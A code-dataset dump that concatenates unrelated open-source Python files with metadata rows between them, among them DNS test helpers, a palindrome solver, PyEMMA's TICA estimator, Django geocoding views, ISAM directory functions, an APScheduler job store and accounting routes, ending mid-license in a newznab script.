def create_default_tlds(self):
for index in range(len(self.default_tld_fixtures)):
try:
self.create_default_tld(fixture=index)
except exceptions.DuplicateTLD:
pass
def create_tsigkey(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_tsigkey_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_tsigkey(context, values=values)
def create_domain(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
# We always need a server to create a domain..
try:
self.create_server()
except exceptions.DuplicateServer:
pass
values = self.get_domain_fixture(fixture=fixture, values=kwargs)
if 'tenant_id' not in values:
values['tenant_id'] = context.tenant
return self.central_service.create_domain(context, values=values)
def create_recordset(self, domain, type='A', **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_recordset_fixture(domain['name'], type=type,
fixture=fixture,
values=kwargs)
return self.central_service.create_recordset(context,
domain['id'],
values=values)
def create_record(self, domain, recordset, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_record_fixture(recordset['type'], fixture=fixture,
values=kwargs)
return self.central_service.create_record(context,
domain['id'],
recordset['id'],
values=values)
def create_blacklist(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_blacklist_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_blacklist(context, values=values)
def _ensure_interface(self, interface, implementation):
for name in interface.__abstractmethods__:
in_arginfo = inspect.getargspec(getattr(interface, name))
im_arginfo = inspect.getargspec(getattr(implementation, name))
self.assertEqual(
in_arginfo, im_arginfo,
"Method Signature for '%s' mismatched" % name)
def _skip_decorator(func):
@functools.wraps(func)
def skip_if_not_implemented(*args, **kwargs):
try:
return func(*args, **kwargs)
except NotImplementedError as e:
raise testcase.TestSkipped(str(e))
except Exception as e:
if 'not implemented' in str(e):
raise testcase.TestSkipped(str(e))
raise
return skip_if_not_implemented
class SkipNotImplementedMeta(type):
def __new__(cls, name, bases, local):
for attr in local:
value = local[attr]
if callable(value) and (
attr.startswith('test_') or attr == 'setUp'):
local[attr] = _skip_decorator(value)
return type.__new__(cls, name, bases, local)
| apache-2.0 | 8,298,000,509,860,290,000 | 31.235521 | 79 | 0.586178 | false |
boxu0001/practice | py3/dynamicProgramming/S5_ManacherAlgo.py | 1 | 1679 | # Given a string s, find the longest palindromic substring in s. You may assume that the maximum length of s is 1000.
# Example:
# Input: "babad"
# Output: "bab"
# Note: "aba" is also a valid answer.
# Example:
# Input: "cbbd"
# Output: "bb"
#Manacher's Algo
class Solution:
def longestPalindrome(self, s):
s1=[s[i//2] if i&1==1 else '|' for i in range(0, len(s)*2+1)]
# print(s1)
f=[0]*(len(s)*2+1)
calced=[False]*(len(s)*2+1)
calced[0]=True
maxd=0
maxi=0
for (cid, c) in enumerate(s1[1:]):
if calced[cid] == True:
continue
dist=1 if 1 > f[cid] else f[cid]
while((not calced[cid]) and cid-dist>=0 and cid+dist<len(s1) and s1[cid-dist]==s1[cid+dist]):
f[cid]=dist
dist+=1
calced[cid]=True
if f[cid] > maxd:
maxd=f[cid]
maxi=cid
lid=cid-f[cid] #left boundary index
rid=cid+f[cid] #right boundary index
for i in range(lid,cid):
if i-f[i] > lid or (i-f[i] == lid and rid == len(s1)-1):
f[2*cid-i]=f[i]
calced[2*cid-i] = True
elif i-f[i] < lid:
f[2*cid-i] = i - lid
else:
f[2*cid-i] = f[i]
# print(f)
return s[(maxi-maxd)//2:(maxi+maxd)//2]
s=Solution()
print(s.longestPalindrome('babad'))
print(s.longestPalindrome('a'))
print(s.longestPalindrome('ab'))
print(s.longestPalindrome('abadedab'))
| gpl-3.0 | -169,681,256,529,589,700 | 28.982143 | 117 | 0.466945 | false |
marscher/PyEMMA | pyemma/coordinates/transform/tica.py | 1 | 11462 | # This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 19.01.2015
@author: marscher
'''
from __future__ import absolute_import
import numpy as np
from pyemma._base.serialization.serialization import SerializableMixIn
from pyemma._ext.variational.solvers.direct import eig_corr
from pyemma._ext.variational.util import ZeroRankError
from pyemma.coordinates.estimation.covariance import LaggedCovariance
from pyemma.coordinates.transform._tica_base import TICABase, TICAModelBase
from pyemma.util.annotators import fix_docs
import warnings
__all__ = ['TICA']
@fix_docs
class TICA(TICABase, SerializableMixIn):
r""" Time-lagged independent component analysis (TICA)"""
__serialize_version = 0
def __init__(self, lag, dim=-1, var_cutoff=0.95, kinetic_map=True, commute_map=False, epsilon=1e-6,
stride=1, skip=0, reversible=True, weights=None, ncov_max=float('inf')):
r""" Time-lagged independent component analysis (TICA) [1]_, [2]_, [3]_.
Parameters
----------
lag : int
lag time
dim : int, optional, default -1
Maximum number of significant independent components to use to reduce dimension of input data. -1 means
all numerically available dimensions (see epsilon) will be used unless reduced by var_cutoff.
Setting dim to a positive value is exclusive with var_cutoff.
var_cutoff : float in the range [0,1], optional, default 0.95
Determines the number of output dimensions by including dimensions until their cumulative kinetic variance
exceeds the fraction subspace_variance. var_cutoff=1.0 means all numerically available dimensions
(see epsilon) will be used, unless set by dim. Setting var_cutoff smaller than 1.0 is exclusive with dim
kinetic_map : bool, optional, default True
Eigenvectors will be scaled by eigenvalues. As a result, Euclidean distances in the transformed data
approximate kinetic distances [4]_. This is a good choice when the data is further processed by clustering.
commute_map : bool, optional, default False
Eigenvector_i will be scaled by sqrt(timescale_i / 2). As a result, Euclidean distances in the transformed
data will approximate commute distances [5]_.
epsilon : float
eigenvalue norm cutoff. Eigenvalues of C0 with norms <= epsilon will be
cut off. The remaining number of eigenvalues define the size
of the output.
stride: int, optional, default = 1
Use only every stride-th time step. By default, every time step is used.
skip : int, default=0
skip the first initial n frames per trajectory.
reversible: bool, default=True
symmetrize correlation matrices C_0, C_{\tau}.
weights: object or list of ndarrays, optional, default = None
* An object that allows to compute re-weighting factors to estimate equilibrium means and correlations from
off-equilibrium data. The only requirement is that weights possesses a method weights(X), that accepts a
trajectory X (np.ndarray(T, n)) and returns a vector of re-weighting factors (np.ndarray(T,)).
* A list of ndarrays (ndim=1) specifies the weights for each frame of each trajectory.
Notes
-----
Given a sequence of multivariate data :math:`X_t`, computes the mean-free
covariance and time-lagged covariance matrix:
.. math::
C_0 &= (X_t - \mu)^T (X_t - \mu) \\
C_{\tau} &= (X_t - \mu)^T (X_{t + \tau} - \mu)
and solves the eigenvalue problem
.. math:: C_{\tau} r_i = C_0 \lambda_i(tau) r_i,
where :math:`r_i` are the independent components and :math:`\lambda_i(tau)` are
their respective normalized time-autocorrelations. The eigenvalues are
related to the relaxation timescale by
.. math:: t_i(tau) = -\tau / \ln |\lambda_i|.
When used as a dimension reduction method, the input data is projected
onto the dominant independent components.
References
----------
.. [1] Perez-Hernandez G, F Paul, T Giorgino, G De Fabritiis and F Noe. 2013.
Identification of slow molecular order parameters for Markov model construction
J. Chem. Phys. 139, 015102. doi:10.1063/1.4811489
.. [2] Schwantes C, V S Pande. 2013.
Improvements in Markov State Model Construction Reveal Many Non-Native Interactions in the Folding of NTL9
J. Chem. Theory. Comput. 9, 2000-2009. doi:10.1021/ct300878a
.. [3] L. Molgedey and H. G. Schuster. 1994.
Separation of a mixture of independent signals using time delayed correlations
Phys. Rev. Lett. 72, 3634.
.. [4] Noe, F. and Clementi, C. 2015. Kinetic distance and kinetic maps from molecular dynamics simulation.
J. Chem. Theory. Comput. doi:10.1021/acs.jctc.5b00553
.. [5] Noe, F., Banisch, R., Clementi, C. 2016. Commute maps: separating slowly-mixing molecular configurations
for kinetic modeling. J. Chem. Theory. Comput. doi:10.1021/acs.jctc.6b00762
"""
super(TICA, self).__init__()
if kinetic_map and commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if (kinetic_map or commute_map) and not reversible:
kinetic_map = False
commute_map = False
warnings.warn("Cannot use kinetic_map or commute_map for non-reversible processes, both will be set to"
"False.")
# this instance will be set by partial fit.
self._covar = None
self.dim = dim
self.var_cutoff = var_cutoff
self.set_params(lag=lag, dim=dim, var_cutoff=var_cutoff, kinetic_map=kinetic_map, commute_map=commute_map,
epsilon=epsilon, reversible=reversible, stride=stride, skip=skip, weights=weights, ncov_max=ncov_max)
@property
def model(self):
if not hasattr(self, '_model') or self._model is None:
self._model = TICAModelBase()
return self._model
def describe(self):
try:
dim = self.dimension()
except RuntimeError:
dim = self.dim
return "[TICA, lag = %i; max. output dim. = %i]" % (self._lag, dim)
def estimate(self, X, **kwargs):
r"""
Chunk-based parameterization of TICA. Iterates over all data and estimates
the mean, covariance and time lagged covariance. Finally, the
generalized eigenvalue problem is solved to determine
the independent components.
"""
return super(TICA, self).estimate(X, **kwargs)
def partial_fit(self, X):
""" incrementally update the covariances and mean.
Parameters
----------
X: array, list of arrays, PyEMMA reader
input data.
Notes
-----
The projection matrix is first being calculated upon its first access.
"""
from pyemma.coordinates import source
iterable = source(X, chunksize=self.chunksize)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._covar is None:
self._covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
self._covar.partial_fit(iterable)
self.model.update_model_params(mean=self._covar.mean, # TODO: inefficient, fixme
cov=self._covar.C00_,
cov_tau=self._covar.C0t_)
self._estimated = False
return self
def _estimate(self, iterable, **kw):
covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._logger_is_active(self._loglevel_DEBUG):
self.logger.debug("Running TICA with tau=%i; Estimating two covariance matrices"
" with dimension (%i, %i)", self._lag, indim, indim)
covar.estimate(iterable, chunksize=self.chunksize, **kw)
self.model.update_model_params(mean=covar.mean,
cov=covar.C00_,
cov_tau=covar.C0t_)
self._diagonalize()
return self.model
def _diagonalize(self):
# diagonalize with low rank approximation
self.logger.debug("diagonalize Cov and Cov_tau.")
try:
eigenvalues, eigenvectors = eig_corr(self.cov, self.cov_tau, self.epsilon, sign_maxelement=True)
except ZeroRankError:
raise ZeroRankError('All input features are constant in all time steps. No dimension would be left after dimension reduction.')
if self.kinetic_map and self.commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if self.kinetic_map: # scale by eigenvalues
eigenvectors *= eigenvalues[None, :]
if self.commute_map: # scale by (regularized) timescales
timescales = 1-self.lag / np.log(np.abs(eigenvalues))
# dampen timescales smaller than the lag time, as in section 2.5 of ref. [5]
regularized_timescales = 0.5 * timescales * np.maximum(np.tanh(np.pi * ((timescales - self.lag) / self.lag) + 1), 0)
eigenvectors *= np.sqrt(regularized_timescales / 2)
self.logger.debug("finished diagonalisation.")
# compute cumulative variance
cumvar = np.cumsum(np.abs(eigenvalues) ** 2)
cumvar /= cumvar[-1]
self.model.update_model_params(cumvar=cumvar,
eigenvalues=eigenvalues,
eigenvectors=eigenvectors)
self._estimated = True
| lgpl-3.0 | -3,940,986,915,072,458,000 | 46.560166 | 139 | 0.627203 | false |
kevinaloys/airpy | airpy/install.py | 1 | 1219 | import os
import requests
import zipfile
import click
import io
import airpy
import simplejson as json
from airpy import utils
def install_metadata(name):
directory = airpy.data_directory + '/' + name
metadata_response = requests.get('https://pypi.python.org/pypi/'+ name + '/json')
if metadata_response.status_code == 200:
metadata = metadata_response.json()
if not os.path.exists(directory):
os.makedirs(directory)
with open(directory + '/' + name + '_airpy.json', 'w') as outfile:
json.dump(metadata, outfile, sort_keys = True, indent = 4, ensure_ascii = False)
return True
else:
return False
def install_documents(name):
response = requests.get('https://readthedocs.org/projects/' + name + '/downloads/htmlzip/latest/')
if response.status_code == 200:
directory = airpy.data_directory + '/' + name
if not os.path.exists(directory):
os.makedirs(directory)
z = zipfile.ZipFile(io.BytesIO(response.content), 'a')
z.extractall(directory)
return True
else:
return False
def airinstall(name):
if utils.is_doc_installed(name):
click.echo('Docs for ' + name + ' is already installed.')
else:
if install_documents(name):
install_metadata(name) | mit | 7,066,963,502,790,274,000 | 26.727273 | 99 | 0.695652 | false |
venicegeo/eventkit-cloud | eventkit_cloud/ui/views.py | 1 | 15164 | # -*- coding: utf-8 -*-
"""UI view definitions."""
import json
from datetime import timedelta
from logging import getLogger
from django.conf import settings
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout as auth_logout
from django.urls import reverse
from django.http import HttpResponse
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
from django.template.context_processors import csrf
from django.views.decorators.http import require_http_methods
from rest_framework.renderers import JSONRenderer
from eventkit_cloud.api.serializers import UserDataSerializer
from eventkit_cloud.ui.helpers import (
file_to_geojson,
set_session_user_last_active_at,
is_mgrs,
is_lat_lon,
)
from eventkit_cloud.utils.geocoding.coordinate_converter import CoordinateConverter
from eventkit_cloud.utils.geocoding.geocode import Geocode
from eventkit_cloud.utils.geocoding.reverse import ReverseGeocode
logger = getLogger(__file__)
@require_http_methods(["GET"])
def create_export(request):
"""
Handles display of the create export page.
"""
user = request.user
max_extent = {"extent": settings.JOB_MAX_EXTENT}
for group in user.groups.all():
if hasattr(group, "export_profile"):
max_extent["extent"] = group.export_profile.max_extent
extent = max_extent.get("extent")
context = {"user": user, "max_extent": extent}
context.update(csrf(request))
return render_to_response("ui/create.html", context, RequestContext(request))
# @user_verification_required
@require_http_methods(["GET"])
def clone_export(request, uuid=None):
"""
Handles display of the clone export page.
"""
max_extent = {"extent": settings.JOB_MAX_EXTENT} # default
user = request.user
for group in user.groups.all():
if hasattr(group, "export_profile"):
max_extent["extent"] = group.export_profile.max_extent
extent = max_extent.get("extent")
context = {"user": user, "max_extent": extent}
context.update(csrf(request))
return render_to_response("ui/clone.html", context, RequestContext(request))
# @user_verification_required
@require_http_methods(["GET"])
def view_export(request, uuid=None): # NOQA
"""
Handles display of the clone export page.
"""
user = request.user
context = {"user": user}
return render_to_response("ui/detail.html", context, RequestContext(request))
def auth(request):
if (request.method == "GET") and request.user.is_authenticated:
# If the user is already authenticated we want to return the user data (required for oauth).
return HttpResponse(
JSONRenderer().render(UserDataSerializer(request.user, context={"request": request}).data),
content_type="application/json",
status=200,
)
elif getattr(settings, "LDAP_SERVER_URI", getattr(settings, "DJANGO_MODEL_LOGIN")):
if request.method == "POST":
"""Logs out user"""
auth_logout(request)
username = request.POST.get("username")
password = request.POST.get("password")
user_data = authenticate(username=username, password=password)
if user_data is None:
return HttpResponse(status=401)
else:
login(request, user_data)
set_session_user_last_active_at(request)
return HttpResponse(
JSONRenderer().render(UserDataSerializer(user_data, context={"request": request}).data),
content_type="application/json",
status=200,
)
if request.method == "GET":
# We want to return a 200 so that the frontend can decide if the auth endpoint is valid for displaying the
# the login form.
return HttpResponse(status=200)
else:
return HttpResponse(status=400)
def logout(request):
"""Logs out user"""
auth_logout(request)
response = redirect("login")
if settings.SESSION_USER_LAST_ACTIVE_AT in request.session:
del request.session[settings.SESSION_USER_LAST_ACTIVE_AT]
response.delete_cookie(settings.AUTO_LOGOUT_COOKIE_NAME, domain=settings.SESSION_COOKIE_DOMAIN)
return response
def require_email(request):
"""
View to handle email collection for new user log in with OSM account.
"""
backend = request.session["partial_pipeline"]["backend"]
return render_to_response("osm/email.html", {"backend": backend}, RequestContext(request))
@require_http_methods(["GET"])
def search(request):
"""
Detects the query type and calls the relevant geocoder to get results
:param request: User request which should include a query parameter
:return: A geojson with features matching the search query
"""
q = request.GET.get("query", None)
if not q:
return HttpResponse(status=204, content_type="application/json")
error_string = "An unknown error occurred while querying for results, please contact an administrator."
degree_range = 0.05
if is_mgrs(q):
# check for necessary settings
if getattr(settings, "CONVERT_API_URL") is None:
return HttpResponse("No Convert API specified", status=501)
if getattr(settings, "REVERSE_GEOCODING_API_URL") is None:
return HttpResponse("No Reverse Geocode API specified", status=501)
# make call to convert which should return a geojson feature of the MGRS location
convert = CoordinateConverter()
try:
mgrs_data = convert.get(q)
except Exception:
return HttpResponse(content=error_string, status=500)
# if no feature geom return nothing
if not mgrs_data or not mgrs_data.get("geometry"):
return HttpResponse(status=204, content_type="application/json")
features = []
# save the mgrs feature to return later
if not mgrs_data.get("properties"):
mgrs_data["properties"] = {}
mgrs_data["properties"]["bbox"] = [
mgrs_data.get("geometry").get("coordinates")[0] - degree_range,
mgrs_data.get("geometry").get("coordinates")[1] - degree_range,
mgrs_data.get("geometry").get("coordinates")[0] + degree_range,
mgrs_data.get("geometry").get("coordinates")[1] + degree_range,
]
mgrs_data["source"] = "MGRS"
features.append(mgrs_data)
# call reverse to get a list of results near the mgrs feature
reverse = ReverseGeocode()
try:
result = reverse.search(
{
"lat": mgrs_data.get("geometry").get("coordinates")[1],
"lon": mgrs_data.get("geometry").get("coordinates")[0],
}
)
except Exception:
return HttpResponse(content=error_string, status=500)
if result.get("features"):
# add the mgrs feature with the search results and return together
result["features"] = features + result["features"]
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
# if no results just return the MGRS feature in the response
return HttpResponse(content=json.dumps({"features": features}), status=200, content_type="application/json",)
elif is_lat_lon(q):
coords = is_lat_lon(q)
# if no reverse url return 501
if getattr(settings, "REVERSE_GEOCODING_API_URL") is None:
return HttpResponse("No Reverse Geocode API specified", status=501)
# make call to reverse geocode
reverse = ReverseGeocode()
try:
result = reverse.search({"lat": coords[0], "lon": coords[1]})
except Exception as e:
return HttpResponse(content=error_string, status=500)
# create a feature representing the exact lat/lon being searched
point_feature = {
"geometry": {"type": "Point", "coordinates": [coords[1], coords[0]]},
"source": "Coordinate",
"type": "Feature",
"properties": {
"name": "{0} {1}, {2} {3}".format(
coords[0] if coords[0] >= 0 else coords[0] * -1,
"N" if coords[0] >= 0 else "S",
coords[1] if coords[1] >= 0 else coords[1] * -1,
"E" if coords[1] >= 0 else "W",
),
"bbox": [
coords[1] - degree_range,
coords[0] - degree_range,
coords[1] + degree_range,
coords[0] + degree_range,
],
},
}
# if there are results add the point feature and return them together
if result.get("features"):
result.get("features").insert(0, point_feature)
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
# if there are no results return only the point feature
features = {"features": [point_feature]}
return HttpResponse(content=json.dumps(features), status=200, content_type="application/json")
else:
# make call to geocode with search
geocode = Geocode()
try:
result = geocode.search(q)
except Exception as e:
logger.error(e)
return HttpResponse(content=error_string, status=500)
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
@require_http_methods(["GET"])
def geocode(request):
geocode = Geocode()
if request.GET.get("search"):
result = geocode.search(request.GET.get("search"))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
if request.GET.get("result"):
result = geocode.add_bbox(json.loads(request.GET.get("result")))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
else:
return HttpResponse(status=204, content_type="application/json")
@require_http_methods(["GET"])
def convert(request):
convert = CoordinateConverter()
if getattr(settings, "CONVERT_API_URL") is not None:
if request.GET.get("convert"):
result = convert.get(request.GET.get("convert"))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
else:
return HttpResponse(status=204, content_type="application/json")
else:
return HttpResponse("No Convert API specified", status=501)
@require_http_methods(["GET"])
def reverse_geocode(request):
reverseGeocode = ReverseGeocode()
if getattr(settings, "REVERSE_GEOCODING_API_URL") is not None:
if request.GET.get("lat") and request.GET.get("lon"):
result = reverseGeocode.search({"lat": request.GET.get("lat"), "lon": request.GET.get("lon")})
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
if request.GET.get("result"):
result = reverseGeocode.add_bbox(json.loads(request.GET.get("result")))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
else:
return HttpResponse(status=204, content_type="application/json")
else:
return HttpResponse("No Reverse Geocode API specified", status=501)
@require_http_methods(["GET"])
def about(request):
exports_url = reverse("list")
help_url = reverse("help")
return render_to_response(
"ui/about.html", {"exports_url": exports_url, "help_url": help_url}, RequestContext(request),
)
@require_http_methods(["GET"])
def help_main(request):
return render_to_response("help/help.html", {}, RequestContext(request))
@require_http_methods(["GET"])
def help_create(request):
create_url = reverse("create")
help_features_url = reverse("help_features")
return render_to_response(
"help/help_create.html",
{"create_url": create_url, "help_features_url": help_features_url},
RequestContext(request),
)
@require_http_methods(["GET"])
def help_features(request):
return render_to_response("help/help_features.html", {}, RequestContext(request))
@require_http_methods(["GET"])
def help_exports(request):
export_url = reverse("list")
return render_to_response("help/help_exports.html", {"export_url": export_url}, RequestContext(request))
@require_http_methods(["GET"])
def help_formats(request):
return render_to_response("help/help_formats.html", {}, RequestContext(request))
@require_http_methods(["GET"])
def help_presets(request):
configurations_url = reverse("configurations")
return render_to_response(
"help/help_presets.html", {"configurations_url": configurations_url}, RequestContext(request),
)
@require_http_methods(["GET"])
def get_config(request):
"""
:param request: a GET request
:return: a dict of available configurations
"""
config = getattr(settings, "UI_CONFIG", {})
return HttpResponse(json.dumps(config), content_type="application/json", status=200)
@require_http_methods(["POST"])
def convert_to_geojson(request):
file = request.FILES.get("file", None)
if not file:
return HttpResponse("No file supplied in the POST request", status=400)
try:
geojson = file_to_geojson(file)
return HttpResponse(json.dumps(geojson), content_type="application/json", status=200)
except Exception as e:
logger.error(e)
return HttpResponse(str(e), status=400)
def user_active(request):
"""Prevents auto logout by updating the session's last active time"""
# If auto logout is disabled, just return an empty body.
if not settings.AUTO_LOGOUT_SECONDS:
return HttpResponse(json.dumps({}), content_type="application/json", status=200)
last_active_at = set_session_user_last_active_at(request)
auto_logout_at = last_active_at + timedelta(seconds=settings.AUTO_LOGOUT_SECONDS)
auto_logout_warning_at = auto_logout_at - timedelta(seconds=settings.AUTO_LOGOUT_WARNING_AT_SECONDS_LEFT)
return HttpResponse(
json.dumps(
{
"auto_logout_at": auto_logout_at.isoformat(),
"auto_logout_warning_at": auto_logout_warning_at.isoformat(),
}
),
content_type="application/json",
status=200,
)
# error views
@require_http_methods(["GET"])
def create_error_view(request):
return render_to_response("ui/error.html", {}, RequestContext(request), status=500)
def internal_error_view(request):
return render_to_response("ui/500.html", {}, RequestContext(request), status=500)
def not_found_error_view(request):
return render_to_response("ui/404.html", {}, RequestContext(request), status=404)
def not_allowed_error_view(request):
return render_to_response("ui/403.html", {}, RequestContext(request), status=403)
| bsd-3-clause | 282,585,686,439,759,100 | 37.683673 | 118 | 0.643827 | false |
IBM-Security/ibmsecurity | ibmsecurity/isam/web/runtime/federated_directories/suffix.py | 1 | 2895 | import logging
import ibmsecurity.utilities.tools
logger = logging.getLogger(__name__)
def get(isamAppliance, directory_name, check_mode=False, force=False):
"""
Retrieving the list of suffixes for a particular federated directory
"""
return isamAppliance.invoke_get("Retrieving the list of suffixes for a particular federated directory",
"/isam/runtime_components/federated_directories/{0}/suffix/v1".format(
directory_name))
def add(isamAppliance, directory_name, suffix, use_ssl=False, client_cert_label=None,
check_mode=False,
force=False):
"""
Create a new suffix in a particular federated directory
"""
if force is True or _check(isamAppliance, directory_name, suffix) is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post(
"Create a new suffix in a particular federated directory",
"/isam/runtime_components/federated_directories/{0}/suffix/v1".format(directory_name),
{
'suffix': suffix
})
return isamAppliance.create_return_object()
def delete(isamAppliance, directory_name, suffix_name, check_mode=False, force=False):
"""
Remove an existing suffix from a federated directory
"""
if force is True or _check(isamAppliance, directory_name, suffix_name) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete(
"Remove an existing suffix from a federated directory",
"/isam/runtime_components/federated_directories/{0}/suffix/{1}/v1".format(directory_name, suffix_name))
return isamAppliance.create_return_object()
def _check(isamAppliance, directory_name, suffix):
"""
Check if federated directory suffix exists - will return true if any match is found
:param isamAppliance:
:param directory_name:
:param suffix:
:return:
"""
ret_obj = get(isamAppliance, directory_name)
for suffix_obj in ret_obj['data']:
if isinstance(suffix, list): # Add passes a list
for new_suffix in suffix:
if new_suffix['id'] == suffix_obj['id']:
return True
else: # Update passes just suffix_name
if suffix_obj['id'] == suffix:
return True
return False
def compare(isamAppliance1, isamAppliance2, directory_name):
"""
Compare snmp objects between two appliances
"""
ret_obj1 = get(isamAppliance1, directory_name)
ret_obj2 = get(isamAppliance2, directory_name)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
| apache-2.0 | 8,466,255,597,332,144,000 | 34.740741 | 119 | 0.639033 | false |
casanovainformationservices/LazyLibrarian | lib/apscheduler/jobstores/sqlalchemy_store.py | 1 | 3135 | """
Stores jobs in a database table using SQLAlchemy.
"""
import pickle
import logging
from lib.apscheduler.jobstores.base import JobStore
from lib.apscheduler.job import Job
try:
from sqlalchemy import *
except ImportError: # pragma: nocover
raise ImportError('SQLAlchemyJobStore requires SQLAlchemy installed')
logger = logging.getLogger(__name__)
class SQLAlchemyJobStore(JobStore):
def __init__(self, url=None, engine=None, tablename='apscheduler_jobs',
metadata=None, pickle_protocol=pickle.HIGHEST_PROTOCOL):
self.jobs = []
self.pickle_protocol = pickle_protocol
if engine:
self.engine = engine
elif url:
self.engine = create_engine(url)
else:
raise ValueError('Need either "engine" or "url" defined')
self.jobs_t = Table(tablename, metadata or MetaData(),
Column('id', Integer,
Sequence(tablename + '_id_seq', optional=True),
primary_key=True),
Column('trigger', PickleType(pickle_protocol, mutable=False),
nullable=False),
Column('func_ref', String(1024), nullable=False),
Column('args', PickleType(pickle_protocol, mutable=False),
nullable=False),
Column('kwargs', PickleType(pickle_protocol, mutable=False),
nullable=False),
Column('name', Unicode(1024), unique=True),
Column('misfire_grace_time', Integer, nullable=False),
Column('coalesce', Boolean, nullable=False),
Column('max_runs', Integer),
Column('max_instances', Integer),
Column('next_run_time', DateTime, nullable=False),
Column('runs', BigInteger))
self.jobs_t.create(self.engine, True)
def add_job(self, job):
job_dict = job.__getstate__()
result = self.engine.execute(self.jobs_t.insert().values(**job_dict))
job.id = result.inserted_primary_key[0]
self.jobs.append(job)
def remove_job(self, job):
delete = self.jobs_t.delete().where(self.jobs_t.c.id == job.id)
self.engine.execute(delete)
self.jobs.remove(job)
def load_jobs(self):
jobs = []
for row in self.engine.execute(select([self.jobs_t])):
try:
job = Job.__new__(Job)
job_dict = dict(list(row.items()))
job.__setstate__(job_dict)
jobs.append(job)
except Exception:
job_name = job_dict.get('name', '(unknown)')
logger.exception('Unable to restore job "%s"', job_name)
self.jobs = jobs
def update_job(self, job):
job_dict = job.__getstate__()
update = self.jobs_t.update().where(self.jobs_t.c.id == job.id).\
values(next_run_time=job_dict['next_run_time'],
runs=job_dict['runs'])
self.engine.execute(update)
def close(self):
self.engine.dispose()
def __repr__(self):
return '<%s (url=%s)>' % (self.__class__.__name__, self.engine.url)
| gpl-3.0 | -7,027,673,187,408,794,000 | 35.034483 | 77 | 0.57512 | false |
Kha/odie-server | routes/accounting.py | 1 | 1757 | #! /usr/bin/env python3
import db.accounting
from .common import IdSchema, CashBoxField
from marshmallow import Schema, fields
from odie import sqla
from login import get_user, login_required
from api_utils import deserialize, api_route, ClientError
from db.documents import Deposit, Document
class ErroneousSaleLoadSchema(Schema):
amount = fields.Int(required=True)
cash_box = CashBoxField()
# db.accounting does its own logging, so these endpoints don't
@api_route('/api/log_erroneous_sale', methods=['POST'])
@login_required
@deserialize(ErroneousSaleLoadSchema)
def accept_erroneous_sale(data):
db.accounting.log_erroneous_sale(data['amount'], get_user(), data['cash_box'])
sqla.session.commit()
return {}
class DepositReturnSchema(IdSchema):
cash_box = CashBoxField()
document_id = fields.Int()
@api_route('/api/log_deposit_return', methods=['POST'])
@login_required
@deserialize(DepositReturnSchema)
def log_deposit_return(data):
if 'document_id' in data:
doc = Document.query.get(data['document_id'])
# data privacy, yo
doc.submitted_by = None
dep = Deposit.query.get(data['id'])
if Deposit.query.filter(Deposit.id == data['id']).delete() == 0:
raise ClientError('deposit not found')
db.accounting.log_deposit_return(dep, get_user(), data['cash_box'])
sqla.session.commit()
return {}
class DonationLoadSchema(Schema):
amount = fields.Int(required=True, validate=lambda i: i != 0)
cash_box = CashBoxField()
@api_route('/api/donation', methods=['POST'])
@login_required
@deserialize(DonationLoadSchema)
def log_donation(data):
db.accounting.log_donation(get_user(), data['amount'], data['cash_box'])
sqla.session.commit()
return {}
| mit | -1,078,629,200,508,396,400 | 27.33871 | 82 | 0.705748 | false |
anth0/nnplus | misc/update_scripts/update.py | 1 | 1977 | #!/usr/bin/env python
# Author: Nic Wolfe <[email protected]>
# URL: http://www.newznab.com/
#
# This file is part of Newznab
#
# Newznab is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Newznab is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
